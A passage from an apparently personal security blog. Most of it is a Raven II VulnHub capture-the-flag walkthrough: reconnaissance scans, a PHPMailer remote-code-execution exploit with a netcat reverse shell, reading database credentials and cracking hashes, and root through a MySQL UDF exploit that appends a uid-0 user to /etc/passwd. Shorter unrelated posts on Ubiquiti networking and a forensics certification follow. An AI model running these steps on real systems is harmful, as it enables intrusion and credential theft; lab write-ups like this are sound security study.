| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 52675/tcp status
|_ 100024 1 55774/udp status
52675/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:C6:56:E8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 199.640 days (since Tue Jun 5 15:33:43 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
From the results we can see:
- An SSH server sitting behind tcp/22 running OpenSSH 6.7p1 Debian 5+deb8u4.
- An Apache webserver running Apache 2.4.10 on tcp/80
- RPCBind services running on tcp/111 and tcp/52675
- The server is potentially running Linux Kernel 3.2-4.9
I run a Nikto scan against the webserver to provide a quick run-down of any obvious vulnerabilities:
root@kali:~# nikto -h 192.168.253.132
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.253.132
+ Target Hostname: 192.168.253.132
+ Target Port: 80
+ Start Time: 2018-12-22 07:57:27 (GMT11)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x41b3 0x5734482bdcb00
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-6694: /.DS_Store: Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version.
+ OSVDB-3233: /icons/README: Apache default file found.
+ Uncommon header 'link' found, with contents: <http://raven.local/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
+ /wordpress/: A Wordpress installation was found.
+ 7535 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2018-12-22 07:57:49 (GMT11) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
What stands out the most to me is detection of a WordPress installation. Also, of note is an older version of Apache server (there may be some vulnerabilities here), as well as a few directory listings.
I navigate to the webpage (https://192.168.254.132) and have a look around. Nothing really stands out to me. There is an admin login page on the WordPress portal. I also notice it’s running the twentyseventeen plugin from the comments in the server response. (Perhaps some vulns there..?)
Before I start a brute-force attempt on the login screen I fire off a scan using wpscan.
root@kali:~# wpscan --url http://192.168.253.132/wordpress --wp-content-dir wp-content
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|Version 3.4.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.253.132/wordpress/
[+] Started: Sat Dec 22 09:18:01 2018
Interesting Finding(s):
[+] http://192.168.253.132/wordpress/
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://192.168.253.132/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://192.168.253.132/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.253.132/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] WordPress version 4.8.8 identified (Latest, released on 2018-12-13).
| Detected By: Emoji Settings (Passive Detection)
| - http://192.168.253.132/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.8'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.253.132/wordpress/, Match: 'WordPress 4.8.8'
[i] The main theme could not be detected.
[+] Enumerating All Plugins
[i] No plugins Found.
[+] Enumerating Config Backups
Checking Config Backups - Time: 00:00:00 <==============================================================================================================================================================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Finished: Sat Dec 22 09:18:04 2018
[+] Requests Done: 38
[+] Cached Requests: 6
[+] Data Sent: 7.229 KB
[+] Data Received: 24.328 KB
[+] Memory used: 51.105 MB
[+] Elapsed time: 00:00:02
root@kali:~#
A few things, but first I look at the detection of an uploads directory and navigate to it. Here I find my first flag located in ../2018/11/flag3.png:
I also notice in the server response (burp screenshot) the comments reference the server as raven.local. In the past, (my GoldenEye vulnhub walkthrough was an example), sometimes you can bypass server-side filters if you address the server using it’s FQDN. To do this, I add raven.local into my local hosts file:
root@kali:~# echo "192.168.253.132 raven.local" >> /etc/hosts
This doesn’t seem to help me or lead me anywhere, but I do it anyway 😊
After looking through the site for a while, next I kick off a dirbuster directory scan. Quite a few results come back. To filter out most of the repeated subdirectories and only output the parent directories, I run the following:
root@kali:~/Documents/raven# cat DirBusterReport-raven.local-80.txt | cut -d "/" -f 2 | sort -u
--------------------------------
about.html
contact.php
css
DirBuster 1.0-RC1 - Report
Directories found during testing:
Dirs found with a 200 response:
Dirs found with a 403 response:
Files found during testing:
Files found with a 200 responce:
Files found with a 301 responce:
Files found with a 403 responce:
Files found with a 500 responce:
icons
img
index.html
js
manual
.php
Report produced on Sat Feb 02 16:51:38 AEDT 2019
service.html
team.html
vendor
wordpress
The directory that instantly sticks out is the vendor directory. Looking around I find a PATH page here http://raven.local/vendor/PATH which leads me to flag1!
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}
I noticed this is an installation directory of PHPMailer. Opening the http://raven.local/vendor/VERSION page I find it’s running version: 5.2.16.
root@kali:~# searchsploit phpmailer
--------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------- ----------------------------------------
PHPMailer 1.7 - 'Data()' Remote Denial of Service | exploits/php/dos/25752.txt
PHPMailer < 5.2.18 - Remote Code Execution (Bash) | exploits/php/webapps/40968.php
PHPMailer < 5.2.18 - Remote Code Execution (PHP) | exploits/php/webapps/40970.php
PHPMailer < 5.2.18 - Remote Code Execution (Python) | exploits/php/webapps/40974.py
PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit) | exploits/multiple/webapps/41688.rb
PHPMailer < 5.2.20 - Remote Code Execution | exploits/php/webapps/40969.pl
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScr | exploits/php/webapps/40986.py
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution | exploits/php/webapps/42221.py
PHPMailer < 5.2.21 - Local File Disclosure | exploits/php/webapps/43056.py
WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit) | exploits/php/remote/42024.rb
--------------------------------------------------------------------------------------------------- ----------------------------------------
Cha-ching. I think I’m onto something here. Rather than using the Metasploit module, I look at the python-based exploit.
Reading through the python RCE and CVE details (https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html)
In summary, the vulnerability that is exploited exist in the mail() function within PHPMailer.
The application uses setFrom() to take input from the sending user (this should be the senders email address). Under the hood, it's using sendmail. Looking around the site further, I find the contact.php page allows input from a site visitor to enter their email address. I assume the PHPMailer program is what’s used to provide this service.
From reading the vulnerability further, it seems this vulnerable version of PHPMailer does not appropriately filter the third parameter within the sendmail command. This allows an attacker to essentially break out of the 3 parameter through escaping, and insert their own arbitrary code.
With this information, I update the exploit:
- Target: Change to the contact.php page (this is what’s used to trigger the vuln)
- Backdoor: This is the name of the malicious php (exploit) that will be uploaded
- IP/Port: This is changed to my kali machine for the reverse shell
root@kali:~/Documents/raven# python 40974.py
I open another terminal and create a netcat listener on tcp/443 to accept an incoming reverse shell:
root@kali:~# nc -lvp 443
listening on [any] 443 ...
To trigger the exploit, I execute the reverse shell by navigating to the uploaded n33dle.php file:
root@kali:~/Documents/raven# curl http://192.168.253.132/n33dle.php
And there you have it, a shell. Nice.
root@kali:~# nc -lvp 443
listening on [any] 443 ...
connect to [192.168.253.131] from raven.local [192.168.253.132] 41127
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:c6:56:e8
inet addr:192.168.253.132 Bcast:192.168.253.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fec6:56e8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:208 errors:0 dropped:0 overruns:0 frame:0
TX packets:233 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:17195 (16.7 KiB) TX bytes:28320 (27.6 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:91 errors:0 dropped:0 overruns:0 frame:0
TX packets:91 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:13578 (13.2 KiB) TX bytes:13578 (13.2 KiB)
$ hostname
Raven
$
As usual, I spawn a python tty shell using:
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Raven:/var/www/html$
I also locate flag2.txt sitting in www-data’s home directory:
www-data@Raven:/var/www$ cat flag2.txt
cat flag2.txt
flag2{6a8ed560f0b5358ecf844108048eb337}
www-data@Raven:/var/www$
--> TIME TO PE
Let’s look at what OS and Kernel we’re running:
www-data@Raven:/var/www/html$ uname -ra
uname -ra
Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux
www-data@Raven:/var/www/html$ cat /etc/*release
cat /etc/*release
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
NAME="Debian GNU/Linux"
VERSION_ID="8"
VERSION="8 (jessie)"
ID=debian
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
www-data@Raven:/var/www/html$
Debian 8 (Jessie) on Linux 3.16.0-6-amd64.
And a quick look at any additional users on the system:
www-data@Raven:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
michael:x:1000:1000:michael,,,:/home/michael:/bin/bash
smmta:x:108:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:109:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
mysql:x:110:116:MySQL Server,,,:/nonexistent:/bin/false
steven:x:1001:1001::/home/steven:/bin/sh
There’s a michael and steven account. Let’s see what groups they’re members of:
www-data@Raven:/home$ id steven
id steven
uid=1001(steven) gid=1001(steven) groups=1001(steven)
www-data@Raven:/home$ id michael
id michael
uid=1000(michael) gid=1000(michael) groups=1000(michael),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
www-data@Raven:/home$
Hmmm, nothing really of interest at this stage. Looking at their home drives, nothing interesting here either:
www-data@Raven:/$ ls -laR /home
ls -laR /home
/home:
total 16
drwxr-xr-x 4 root root 4096 Aug 13 13:51 .
drwxr-xr-x 22 root root 4096 Aug 13 07:38 ..
drwxr-xr-x 2 michael michael 4096 Aug 13 07:52 michael
drwxr-xr-x 2 root root 4096 Aug 13 14:20 steven
/home/michael:
total 20
drwxr-xr-x 2 michael michael 4096 Aug 13 07:52 .
drwxr-xr-x 4 root root 4096 Aug 13 13:51 ..
-rw-r--r-- 1 michael michael 220 Aug 13 07:52 .bash_logout
-rw-r--r-- 1 michael michael 3515 Aug 13 07:52 .bashrc
-rw-r--r-- 1 michael michael 675 Aug 13 07:52 .profile
/home/steven:
total 8
drwxr-xr-x 2 root root 4096 Aug 13 14:20 .
drwxr-xr-x 4 root root 4096 Aug 13 13:51 ..
www-data@Raven:/$
I run the linuxprivchecker.py tool and analyse its output. I notice the wp-config.php file is world-writable, and it has also been modified by www-data. Obviously, this has been modified by the VM creator.
Reading it’s contents, I find some local DB creds.
www-data@Raven:/var/www$ cat /var/www/html/wordpress/wp-config.php
cat /var/www/html/wordpress/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');
/** MySQL hostname */
define('DB_HOST', 'localhost');
I also confirm a MySQL server is running locally:
www-data@Raven:/var/www$ netstat -tl
netstat -tl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:48453 *:* LISTEN
tcp 0 0 localhost:mysql *:* LISTEN
tcp 0 0 localhost:submission *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
tcp 0 0 *:ssh *:* LISTEN
tcp 0 0 localhost:smtp *:* LISTEN
tcp6 0 0 [::]:54187 [::]:* LISTEN
tcp6 0 0 [::]:sunrpc [::]:* LISTEN
tcp6 0 0 [::]:http [::]:* LISTEN
tcp6 0 0 [::]:ssh [::]:* LISTEN
Let’s try connecting:
www-data@Raven:/var/www$ mysql -h localhost -u root -p
mysql -h localhost -u root -p
Enter password: R@v3nSecurity
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 41
Server version: 5.5.60-0+deb8u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0.00 sec)
mysql>
Awesome. Now let’s have a quick snoop around. Check the users:
mysql> use wordpress;
use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)
mysql> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$B6X3H3ykawf2oHuPsbjQiih5iJXqad. | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)
mysql>
Let's try cracking those. I output them to file on my Kali box and run john:
root@kali:~/Documents/raven# john --wordlist=/usr/share/wordlists/rockyou.txt pwords
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
While that’s running, I check what version of mysql is running:
mysql> show variables like "%version%";
show variables like "%version%";
+-------------------------+------------------+
| Variable_name | Value |
+-------------------------+------------------+
| innodb_version | 5.5.60 |
| protocol_version | 10 |
| slave_type_conversions | |
| version | 5.5.60-0+deb8u1 |
| version_comment | (Debian) |
| version_compile_machine | x86_64 |
| version_compile_os | debian-linux-gnu |
+-------------------------+------------------+
7 rows in set (0.00 sec)
Reviewing my results again from linuxprivchecker.py, I see the mysql version is vuln to the UDF local privilege escalation exploit.
...
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
- Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit || http://www.exploit-db.com/exploits/5720 || Language=python
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
...
I’ve seen and used this before. This exploit allows you to write and access files as root within mysql. This essentially allows you to own the box as you can create new users, modify existing and/or basically do anything you like!
First I download the exploit to the target using the python SimpleHTTPServer and wget.
www-data@Raven:/var/www$ wget http://192.168.253.131/1518.c
wget http://192.168.253.131/1518.c
converted 'http://192.168.253.131/1518.c' (ANSI_X3.4-1968) -> 'http://192.168.253.131/1518.c' (UTF-8)
--2019-02-03 08:18:09-- http://192.168.253.131/1518.c
Connecting to 192.168.253.131:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3378 (3.3K) [text/plain]
Saving to: '1518.c'
1518.c 100%[=====================>] 3.30K --.-KB/s in 0s
2019-02-03 08:18:09 (705 MB/s) - '1518.c' saved [3378/3378]
www-data@Raven:/var/www$
Following the exploit instructions I rename and compile it:
www-data@Raven:/var/www$ mv 1518.c n33dle.c
mv 1518.c n33dle.c
www-data@Raven:/var/www$ gcc -g -c n33dle.c
gcc -g -c n33dle.c
root@kali:~/Documents/raven# gcc -g -shared -Wl,-soname,n33dle.so -o n33dle.so n33dle.o -lc
gcc -g -shared -Wl,-soname,n33dle.so -o n33dle.so n33dle.o -lc
With the n33dle.so SUID file created, I log back into the mysql db and follow the rest of the exploit instructions.
mysql> use mysql;
use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> create table foo(line blob);
create table foo(line blob);
Query OK, 0 rows affected (0.01 sec)
mysql> insert into foo values(load_file('/var/www/n33dle.so'));
insert into foo values(load_file('/var/www/n33dle.so'));
Query OK, 1 row affected (0.02 sec)
mysql> select * from foo into dumpfile '/var/www/n33dle.so';
select * from foo into dumpfile '/var/www/n33dle.so';
ERROR 1086 (HY000): File '/var/www/n33dle.so' already exists
mysql> select * from foo into dumpfile '/usr/lib/n33dle.so';
select * from foo into dumpfile '/usr/lib/n33dle.so';
Query OK, 1 row affected (0.01 sec)
mysql> create function do_system returns integer soname 'n33dle.so';
create function do_system returns integer soname 'n33dle.so';
Query OK, 0 rows affected (0.00 sec)
mysql> select * from mysql.func;
select * from mysql.func;
+-----------+-----+-----------+----------+
| name | ret | dl | type |
+-----------+-----+-----------+----------+
| do_system | 2 | n33dle.so | function |
+-----------+-----+-----------+----------+
1 row in set (0.00 sec)
What I’ve done here is essentially link the do_system function to a SUID n33dle.so file. This can now be called within mysql to execute any system command as root. A cool trick I’ve found is creating a new root user. In the past I’ve modified the existing root user, removing the ‘x’ from /etc/passwd. This would allow me to su to root without a password. However, this will most likely break the system and cause a DoS. So instead, lets create a new root user with a password I’ve set.
On my Kali box, I create the hashed password of ‘n33dle’.
root@kali:~/Documents/raven# openssl passwd n33dle
RHV9/0Q6VW2nI
Using the hashed password above. I call the do_system function in the mysql database and echo a new line into the Raven /etc/passwd file. This creates a new root level user with a username and password of n33dle:n33dle:
mysql> select do_system('echo "n33dle:RHV9/0Q6VW2nI:0:0:root:/root:/bin/bash" >> /etc/passwd');
<ho "n33dle:RHV9/0Q6VW2nI:0:0:root:/root:/bin/bash" >> /etc/passwd');
+----------------------------------------------------------------------------------+
| do_system('echo "n33dle:RHV9/0Q6VW2nI:0:0:root:/root:/bin/bash" >> /etc/passwd') |
+----------------------------------------------------------------------------------+
| 0 |
+----------------------------------------------------------------------------------+
1 row in set (0.00 sec)
Exit out of the mysql db and it’s easy as changing to the newly created root user ‘n33dle’:
www-data@Raven:/var/www$ su n33dle
su n33dle
Password: n33dle
root@Raven:/var/www# id
id
uid=0(root) gid=0(root) groups=0(root)
root@Raven:/var/www# whoami
whoami
root
root@Raven:/var/www#
And there we have it, I’m now root! To finish it off, the final flag:
root@Raven:/var/www# cd /root
cd /root
root@Raven:~# ls
ls
flag4.txt
root@Raven:~# cat flag4.txt
cat flag4.txt
___ ___ ___
| _ \__ ___ _____ _ _ |_ _|_ _|
| / _` \ V / -_) ' \ | | | |
|_|_\__,_|\_/\___|_||_|___|___|
flag4{df2bc5e951d91581467bb9a2a8ff4425}
CONGRATULATIONS on successfully rooting RavenII
I hope you enjoyed this second interation of the Raven VM
Hit me up on Twitter and let me know what you thought:
@mccannwj / wjmccann.github.io
root@Raven:~#
The password crack ended up finishing and locating steven’s password:
root@kali:~/Documents/raven# john --wordlist=/usr/share/wordlists/rockyou.txt pwords
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
LOLLOL1 (?)
1g 0:00:41:01 DONE (2019-02-03 08:47) 0.000406g/s 5827p/s 6253c/s 6253C/s ..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed
I tried to SSH as steven, but that didn’t work. Given they are WordPress creds, they did however let me login to the Wordpress admin portal. Perhaps there’s some other vuln here... Anyway, I’m done!
Hope you enjoyed.
--> n33dle
Thursday 18 October 2018
On the Ubiquiti bandwagon
Bit of a different post then usual.
I recently joined the seemingly popular Ubiquiti cult of networking devices at home. I've read about these a lot, and heard nothing but good things. I've also wanted to improve my home network, especially having some intelligence on what's talking to what, by whom and where.
For the last few years, I've been using a Netgear router running DD-WRT which I installed.
It's been fantastic, and has served me very well. It's SPI firewall is leaps and miles ahead of any factory router firmware, and the level of control has been great. I heavily used the OpenVPN server to VPN home for checking my NVR/IP cameras, while restricting their ability to access the internet.
If I had time, I'd build more upon my home lab to ingest a lot of the syslog generated from the DD-WRT router, including netflow traffic, and even thought about introducing PFSense and Security Onion.
Then I thought, based on the reviews, how about I just throw a few hundred bucks at Ubiquiti and let it (supposedly) do it all for me!
This is what ~$900 gives you:
I recently joined the seemingly popular Ubiquiti cult of networking devices at home. I've read about these a lot, and heard nothing but good things. I've also wanted to improve my home network, especially having some intelligence on what's talking to what, by whom and where.
For the last few years, I've been using a Netgear router running DD-WRT which I installed.
It's been fantastic, and has served me very well. It's SPI firewall is leaps and miles ahead of any factory router firmware, and the level of control has been great. I heavily used the OpenVPN server to VPN home for checking my NVR/IP cameras, while restricting their ability to access the internet.
If I had time, I'd build more upon my home lab to ingest a lot of the syslog generated from the DD-WRT router, including netflow traffic, and even thought about introducing PFSense and Security Onion.
Then I thought, based on the reviews, how about I just throw a few hundred bucks at Ubiquiti and let it (supposedly) do it all for me!
This is what ~$900 gives you:
- Ubiquti 24 port POE switch
- Ubiquiti Security Gateway
- Ubiquiti AC-PRO Wireless AP
And here it is all wired up in my (ghetto) rack:
I didn't buy the official cloud key, instead opted to install the UniFI controller (UniFiPi) on a spare RP3 I had. I tell you what, save yourself $$$ and use the RP. While I can't compare to the cloud key. UniFiPi on my RP3 has been running flawlessly.
Check out UniFiPi here: https://unifipi.com/
What's the difference between the cloud key and UniFiPi. Not much. See here:
https://unifipi.com/2018/10/08/unifipi-vs-cloud-key/
In terms of installing and setup, it literally is plug it all in, access your UniFi controller, adopt all UniFi devices into your network and magic happens. Done.
Within a few minutes, the Deep Packing Inspection (DPI) on the security gateway immediately started analysing net-flow traffic and presenting it all in a nice pretty dashboard.
Some examples:
UniFi adopted devices:
Connected clients:
Summary of traffic:
Deep dive into PC traffic:
I've only had this running for a day. I need to spend more time on understanding what data is available. I want to implement an L2TP VPN back home, using 2FA with Google Authenticator. I've also enable the IDS/IPS. Luckily the dashboard is empty :)
So happy with my purchase and I highly recommend for a no fuss setup if you're looking for a product to understand your home network more.
--> n33dle
Sunday 23 September 2018
GIAC Certified Forensic Analyst (GCFA) – PASSED
I recently sat and successfully obtained my GIAC Certified Forensic Analyst certification and thought I'd write a small post about it. What a year it’s been of study. I started my OSCP in early February. As per my previous post about it, it was a brutal 90 days of persistence, patience and suffering :)
After passing my OSCP, I had about 1 week of ‘free time’ before attending the SANS event for the FOR508: Advanced Digital Forensics and Incident Response course. I had this already booked from late 2017. So I knew it was coming, which I guess added to my stress of passing the OSCP first time and quickly.
--> What is it?
The course was great, it was the usual SANS format which entailed 6 days of lecturing from industry experts. The courses themselves are always valuable, not just from the content, but from the stories of people in the industry. You get real-life examples of how the content you’re learning is applied in day-to-day work.
There’s a lot covered in the course and at a high level:
- The incident response, threat intelligence & threat hunting process
- Cyber kill chain and Mitre ATT&CK models
- In-depth memory forensics
- Finding evidence of malware and answering (who, how, why?!)
- Carving out artefacts to create a ‘story’ and timeline of what happened
- In-depth look of the Windows file-system and how it all works
--> Study tips
This is my 3rd SANS certification and I think I’ve now got the hang of studying for these. During the course week, I tend to just listen as much and as I can and not really focus on the books. Tip, Get the most out of being there. It’s how you study later in your own time for passing the exam. While you’re there, just enjoy it. You’ve probably paid good $$$ for it too!
After the course, I take a few weeks away from it then get into studying. My method is simple, read the books and create an index.
The exam is open book where you can bring in an armful of written content. The best and only content you need is the official books and an index of keywords and page numbers.
I give all books a thorough read-through highlighting keywords, statements and points. This can take a while if not weeks. Once I’ve gone through all books, I then do it again, this time I create an index in Excel which is simply:
Keyword, Book Number, Page number.
For this certification, my index was 18 pages long. After I’ve completed the second read-through and built this index, time to sit a practice exam. My advice, sit them as you would the real exam. Set aside 3 hours of uninterrupted time, only using what you’d bring into the exam. I passed my first test with 73% (just scrapped through). Pass mark is 71%.
At the end, a summary is provided. Use this to focus on areas where you should devote more time.
In the end, I passed my exam with 88% and only 37 seconds to spare! It was a nerve racking final 5 minutes.
I could definitely tell during my second read-through of this course I was ‘burnt-out’ with study. Having just finished the OSCP where I dedicated easily 300-500 hours, I had one week break, then onto the GCFA.
--> Why the GCFA?
You might be wondering why I did do a forensics course/certification after my OSCP? Simple. I’m passionate about all things security and an advocate for learning both sides of the story. A great blue-teamer should have an understanding of how their adversary is attacking them. Likewise for a penetration tester. Understanding how your actions will be detected, what footprint you’ll leave behind and how you may (or may not) be detected, can only do you justice in rounding out your skills.
I’ve learnt great techniques to help me with my journey as a penetration tester. There’s definitely ways in which forensics can be used for the offensive. Why try and break through a hardened host with multiple layers of security? For example, if you can obtain or somehow gain access to a hypervisor with the right privileges, and take snapshots or memory of servers, it makes hacking easy.
Once you have a memory image, you’re not restricted by defensive security products and Windows security controls. You have free rein access to data. At the end of the day, that’s what an attacker/pentester is after. Data.
I’m amazed at how mature forensic tools have become. I can’t imagine how a lot of this would have been done 20-30 years ago. Now, it literally is just mounting an image, running some tools to get what you need. It’s great, and kudos to all the developers of forensic tools.
--> Next certification?
You cray! For now, I think it’s time to rest the brain. But keen to attack a CREST certification or the OSWP. Perhaps in 2019
--> n33dle
Thursday 13 September 2018
A look (and play) into CVE-2018-8440. The Windows ALPC Elevation of Privilege Vulnerability
--> So what is it?
